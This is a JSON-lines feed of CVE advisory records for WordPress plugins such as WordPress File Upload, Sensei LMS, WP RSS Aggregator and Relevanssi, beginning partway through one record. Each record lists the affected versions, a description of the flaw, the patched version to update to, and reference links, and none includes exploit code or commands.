version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c44c36a-c4c7-49c2-b750-1589e7840dde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c44c36a-c4c7-49c2-b750-1589e7840dde?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_WPAPI_Mods.php#L567\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_WPAPI_Mods.php#L567\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997160\\\/apppresser\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997160\\\/apppresser\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_API_Limit.php?rev=2997182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_API_Limit.php?rev=2997182\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0448","slug":"wp-helper-lite","versionEndExcluding":"4.3","description":"The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5945","slug":"wp-svg-images","versionImpact":"4.2","versionEndExcluding":"4.3","description":"The WP SVG Images plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018type\u2019 parameter in all versions up to, and including, 4.2 due to insufficient input sanitization. This makes it possible for authenticated attackers, with Author-level access and above, who have permissions to upload sanitized files, to bypass SVG sanitization and inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/389d96e9-1fad-49a6-89b6-8f7f108d8117?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/389d96e9-1fad-49a6-89b6-8f7f108d8117?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-svg-images\\\/trunk\\\/wp-svg-images.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-svg-images\\\/trunk\\\/wp-svg-images.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-svg-images\\\/trunk\\\/wp-svg-images.php#L313\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-svg-images\\\/trunk\\\/wp-svg-images.php#L313\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105276\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105276\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1435","slug":"ajax-search-pro","versionEndExcluding":"4.26.2","description":"The Ajax Search Pro WordPress plugin before 4.26.2 does not sanitise and escape various parameters before outputting them back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ca62908-4ef5-41e0-9223-f77ad2c333d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ca62908-4ef5-41e0-9223-f77ad2c333d7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13494","slug":"wp-file-upload","versionImpact":"4.25.2","versionEndExcluding":"4.25.3","description":"The WordPress File Upload plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.25.2. This is due to missing or incorrect nonce validation on the 'wfu_file_details' function. This makes it possible for unauthenticated attackers to modify user data details associated with uploaded files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.25.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241028\\\/wp-file-upload\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241028\\\/wp-file-upload\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/595a6ab3-0731-4ef4-a385-5dfebbd917f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/595a6ab3-0731-4ef4-a385-5dfebbd917f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11613","slug":"wp-file-upload","versionImpact":"4.24.15","versionEndExcluding":"4.25.0","description":"The WordPress File Upload plugin for WordPress is vulnerable to Remote Code Execution, Arbitrary File Read, and Arbitrary File Deletion in all versions up to, and including, 4.24.15 via the 'wfu_file_downloader.php' file. This is due to lack of proper sanitization of the 'source' parameter and allowing a user-defined directory path. This makes it possible for unauthenticated attackers to execute code on the server.","recommendation":"Update to version 4.25.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-file-upload\\\/trunk\\\/wfu_file_downloader.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-file-upload\\\/trunk\\\/wfu_file_downloader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217005\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217005\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31052fe6-a0ae-4502-b2d2-dbc3b3bf672f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31052fe6-a0ae-4502-b2d2-dbc3b3bf672f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12719","slug":"wp-file-upload","versionImpact":"4.24.15","versionEndExcluding":"4.25.0","description":"The WordPress File Upload plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wfu_ajax_action_read_subfolders' function in all versions up to, and including, 4.24.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform limited path traversal to view directories and subdirectories in WordPress. Files cannot be viewed.","recommendation":"Update to version 4.25.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/trunk\\\/lib\\\/wfu_ajaxactions.php#L849\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/trunk\\\/lib\\\/wfu_ajaxactions.php#L849\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217005\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217005\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314ae0f5-8a4e-4bf3-9fc9-49f5b036b99e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314ae0f5-8a4e-4bf3-9fc9-49f5b036b99e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39639","slug":"wp-file-upload","versionImpact":"4.24.7","versionEndExcluding":"4.24.8","description":"Broken Access Control vulnerability in Nickolas Bossinas WordPress File Upload allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress File Upload: from n\/a through 4.24.7.","recommendation":"Update to version 4.24.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-file-upload\\\/wordpress-wordpress-file-upload-plugin-4-24-7-broken-access-control-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-file-upload\\\/wordpress-wordpress-file-upload-plugin-4-24-7-broken-access-control-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6651","slug":"wp-file-upload","versionImpact":"4.24.7","versionEndExcluding":"4.24.8","description":"The WordPress File Upload WordPress plugin before 4.24.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.24.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65e2c77d-09bd-4a44-81d9-d7a5db0e0f84\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65e2c77d-09bd-4a44-81d9-d7a5db0e0f84\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6494","slug":"wp-file-upload","versionImpact":"4.24.7","versionEndExcluding":"4.24.8","description":"The WordPress File Upload WordPress plugin before 4.24.8 does not properly sanitize and escape certain parameters, which could allow unauthenticated users to execute stored cross-site scripting (XSS) attacks.","recommendation":"Update to version 4.24.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b21a9be-b5fe-47ef-91c7-018dd42f763f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b21a9be-b5fe-47ef-91c7-018dd42f763f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5852","slug":"wp-file-upload","versionImpact":"4.24.7","versionEndExcluding":"4.24.8","description":"The WordPress File Upload plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.24.7 via the 'uploadpath' parameter of the wordpress_file_upload shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload limited files to arbitrary locations on the web server.","recommendation":"Update to version 4.24.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39bb69e0-fb18-4737-9eb7-bda2b5bc16a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39bb69e0-fb18-4737-9eb7-bda2b5bc16a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118456%40wp-file-upload&new=3118456%40wp-file-upload&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118456%40wp-file-upload&new=3118456%40wp-file-upload&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0466","slug":"sensei-lms","versionImpact":"4.24.3","versionEndExcluding":"4.24.4","description":"The Sensei LMS  WordPress plugin before 4.24.4 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak sensei_email and sensei_message Information.","recommendation":"Update to version 4.24.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53ab86dc-1195-4ba0-8eda-6a0d7b45c45f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/53ab86dc-1195-4ba0-8eda-6a0d7b45c45f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7786","slug":"sensei-lms","versionImpact":"4.24.1","versionEndExcluding":"4.24.2","description":"The Sensei LMS  WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.","recommendation":"Update to version 4.24.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f44e6f8f-3ef2-45c9-ae9c-9403305a548a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f44e6f8f-3ef2-45c9-ae9c-9403305a548a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9608","slug":"woocommerce-myparcel","versionImpact":"4.24.1","versionEndExcluding":"4.24.2","description":"The MyParcel plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.24.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Please note this is only exploitable when the WooCommerce store is set to Belgium.","recommendation":"Update to version 4.24.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206928\\\/woocommerce-myparcel\\\/tags\\\/4.24.2\\\/includes\\\/admin\\\/settings\\\/class-wcmypa-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206928\\\/woocommerce-myparcel\\\/tags\\\/4.24.2\\\/includes\\\/admin\\\/settings\\\/class-wcmypa-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6c85f2b-965d-477f-9d9a-4a3f315c4904?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6c85f2b-965d-477f-9d9a-4a3f315c4904?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9939","slug":"wp-file-upload","versionImpact":"4.24.13","versionEndExcluding":"4.24.14","description":"The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.13 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read files outside of the originally intended directory.","recommendation":"Update to version 4.24.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188857\\\/wp-file-upload\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188857\\\/wp-file-upload\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e51f301-026d-4ed7-82f8-96c1623bf95c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e51f301-026d-4ed7-82f8-96c1623bf95c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11635","slug":"wp-file-upload","versionImpact":"4.24.12","versionEndExcluding":"4.24.14","description":"The WordPress File Upload plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.24.12 via the 'wfu_ABSPATH' cookie parameter. This makes it possible for unauthenticated attackers to execute code on the server.","recommendation":"Update to version 4.24.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-file-upload\\\/trunk\\\/wfu_file_downloader.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-file-upload\\\/trunk\\\/wfu_file_downloader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5165f60-6515-4a2c-a124-cc88155eaf01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5165f60-6515-4a2c-a124-cc88155eaf01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9047","slug":"wp-file-upload","versionImpact":"4.24.11","versionEndExcluding":"4.24.12","description":"The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.","recommendation":"Update to version 4.24.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/554a314c-9e8e-4691-9792-d086790ef40f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/554a314c-9e8e-4691-9792-d086790ef40f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164449\\\/wp-file-upload\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164449\\\/wp-file-upload\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4860","slug":"wp-rss-aggregator","versionImpact":"4.23.8","versionEndExcluding":"4.23.9","description":"The 'WordPress RSS Aggregator' WordPress Plugin, versions < 4.23.9 are affected by a Cross-Site Scripting (XSS) vulnerability due to the lack of sanitization of the\u00a0\u00a0'notice_id' \u00a0GET parameter.","recommendation":"Update to version 4.23.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-16\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2024-16\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0628","slug":"wp-rss-aggregator","versionImpact":"4.23.5","versionEndExcluding":"4.23.6","description":"The WP RSS Aggregator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.23.5 via the RSS feed source in admin settings. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 4.23.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2154383e-eabb-4964-8991-423dd68d5efb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2154383e-eabb-4964-8991-423dd68d5efb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029525\\\/wp-rss-aggregator\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029525\\\/wp-rss-aggregator\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0630","slug":"wp-rss-aggregator","versionImpact":"4.23.4","versionEndExcluding":"4.23.5","description":"The WP RSS Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the RSS feed source in all versions up to, and including, 4.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.23.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93cb3b29-b1a0-4d40-a057-1b41f3b181f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026269\\\/wp-rss-aggregator\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026269\\\/wp-rss-aggregator\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4811","slug":"wp-file-upload","versionEndExcluding":"4.23.3","description":"The WordPress File Upload WordPress plugin before 4.23.3 does not sanitise and escape some of its settings, which could allow high privilege users such as contributors to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 4.23.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f9271f2-4de4-4be3-8746-2a3f149eb1d1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f9271f2-4de4-4be3-8746-2a3f149eb1d1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9583","slug":"wp-rss-aggregator","versionImpact":"4.23.12","versionEndExcluding":"4.23.13","description":"The RSS Aggregator \u2013 RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the wprss_ajax_send_premium_support function in all versions up to, and including, 4.23.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send premium support requests with an attacker-controlled subject line and email address to support allowing them to impersonate the site owner. License information may also be leaked.","recommendation":"Update to version 4.23.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/126c77fa-11c5-431f-8fc9-0375ed6c8a91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/126c77fa-11c5-431f-8fc9-0375ed6c8a91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/admin-help.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/admin-help.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168468\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/admin-help.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168468\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/admin-help.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6621","slug":"wp-rss-aggregator","versionImpact":"4.23.11","versionEndExcluding":"4.23.12","description":"The RSS Aggregator \u2013 RSS Import, News Feeds, Feed to Post, and Autoblogging plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wprss_activate_feed_source' and 'wprss_pause_feed_source' functions in all versions up to, and including, 4.23.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate or pause existing RSS feeds.","recommendation":"Update to version 4.23.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e37331b-0b75-41ee-b390-532efd674cc1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e37331b-0b75-41ee-b390-532efd674cc1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php?rev=3118231\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-rss-aggregator\\\/trunk\\\/includes\\\/feed-states.php?rev=3118231\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9021","slug":"relevanssi","versionImpact":"4.23.0","versionEndExcluding":"4.23.1","description":"In the process of testing the Relevanssi  WordPress plugin before 4.23.1, a vulnerability was found that allows you to implement Stored XSS on behalf of the Contributor+ by embedding malicious script, which entails account takeover backdoor","recommendation":"Update to version 4.23.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f25646d-b80b-40b1-bcaf-3b860ddc4059\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f25646d-b80b-40b1-bcaf-3b860ddc4059\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7630","slug":"relevanssi","versionImpact":"4.22.2","versionEndExcluding":"4.23.0","description":"The Relevanssi \u2013 A Better Search plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.22.2 via the relevanssi_do_query() due to insufficient limitations on the posts that are returned when searching. This makes it possible for unauthenticated attackers to extract potentially sensitive information from password protected posts.","recommendation":"Update to version 4.23.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fa78f4e-ede2-4863-a2d7-99bd8c7b5912?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fa78f4e-ede2-4863-a2d7-99bd8c7b5912?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134753\\\/relevanssi\\\/trunk\\\/lib\\\/common.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134753\\\/relevanssi\\\/trunk\\\/lib\\\/common.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1380","slug":"relevanssi","versionImpact":"4.22.0","versionEndExcluding":"4.22.1","description":"The Relevanssi \u2013 A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The vendor has indicated that they may look into adding a capability check for proper authorization control, however, this vulnerability is theoretically patched as is.","recommendation":"Update to version 4.22.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5884","slug":"word-balloon","versionImpact":"4.20.2","versionEndExcluding":"4.20.3","description":"The Word Balloon WordPress plugin before 4.20.3 does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to trick a logged in user to delete arbitrary avatars by clicking a link.","recommendation":"Update to version 4.20.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4a7937c-6f4b-49dd-b88a-67ebe718ad19\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4a7937c-6f4b-49dd-b88a-67ebe718ad19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8009","slug":"sensei-lms","versionImpact":"4.19.2","versionEndExcluding":"4.20.0","description":"The Sensei LMS  WordPress plugin before 4.20.0 disclose all users of the blog including their email address to teachers on the students page","recommendation":"Update to version 4.20.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/737bb010-b2fa-4bf4-b124-5fbba67cf935\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/737bb010-b2fa-4bf4-b124-5fbba67cf935\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
